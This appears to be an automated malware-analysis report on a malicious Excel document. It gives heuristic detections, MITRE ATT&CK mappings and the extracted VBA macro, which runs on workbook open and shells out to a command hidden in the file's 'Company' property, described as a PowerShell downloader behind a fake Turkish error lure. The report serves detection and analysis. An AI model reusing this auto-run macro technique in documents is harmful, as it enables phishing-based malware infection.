MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059.001 PowerShell
T1203 Exploitation for Client Execution
The sample is an Excel document containing a Workbook_Open macro that uses the Shell() function to execute PowerShell. The document body displays a fake error message in Turkish, prompting the user to enable macros, which is a common social engineering tactic. The macro's intent is to download and execute a second-stage payload via PowerShell.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6967028-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6967028-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Private Function wkftr() As Byte Call VBA.Shell$(ActiveWorkbook.BuiltinDocumentProperties("CoMPANY").Value, 0) End Function -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Option Explicit Static Sub woRkbook_OPEN(): Call wkftr: End Sub Private Function wkftr() As Byte -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 816 bytes |
SHA-256: eea3c6057d90989ed2b29c002acc14f8bd5e8514f4c58181e34d1f47796472fe |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Transformationdoc"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "TranformationsDocs"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub woRkbook_OPEN(): Call wkftr: End Sub
Private Function wkftr() As Byte
Call VBA.Shell$(ActiveWorkbook.BuiltinDocumentProperties("CoMPANY").Value, 0)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.